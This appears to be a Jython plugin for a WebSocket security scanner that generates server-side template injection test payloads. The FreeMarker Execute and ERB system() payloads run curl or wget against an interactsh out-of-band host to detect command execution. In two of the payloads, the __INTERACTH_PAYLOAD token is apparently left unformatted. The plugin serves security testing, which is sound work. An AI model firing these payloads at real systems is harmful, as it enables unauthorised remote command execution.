from com.wsproxy.mvc.model import InteractShTestPayload
from com.wsproxy.anomalydetection import DetectedAnomaly
from java.util import ArrayList

def getName():
    return "Interactsh OOB tests for SSTI"
    
def getActiveRuleType():
    return "PAYLOAD-INTERACTSH"

def getDescription():
    return "If an interactsh server is available SSTI tests will be generated using a trackable id"

def getCategory():
    return "SSRF"
    
def getFrameScope():
  return ["TEXT","PING","PONG","CLOSE","BINARY","CONTINUATION"]

def getTestScope():
  return "PRESENTATION-WS"

def getOOBPayloads( interactsh ):
    payloads = []
    payload = interactsh.getPayload();
    payloads.append(InteractShTestPayload("<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ ex(\"curl {}\") }".format(payload),payload))

    payload = interactsh.getPayload();
    payloads.append(InteractShTestPayload("<%= system(\"curl __INTERACTH_PAYLOAD\") %>".format(payload),payload))

    payload = interactsh.getPayload();
    payloads.append(InteractShTestPayload("<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ ex(\"wget {}\") }".format(payload),payload))

    payload = interactsh.getPayload();
    payloads.append(InteractShTestPayload("<%= system(\"wget __INTERACTH_PAYLOAD\") %>".format(payload),payload))

    return payloads
  
def analyze( websocket_messages ):
    anomalies = ArrayList()
    return anomalies

def selfTest():
    return True
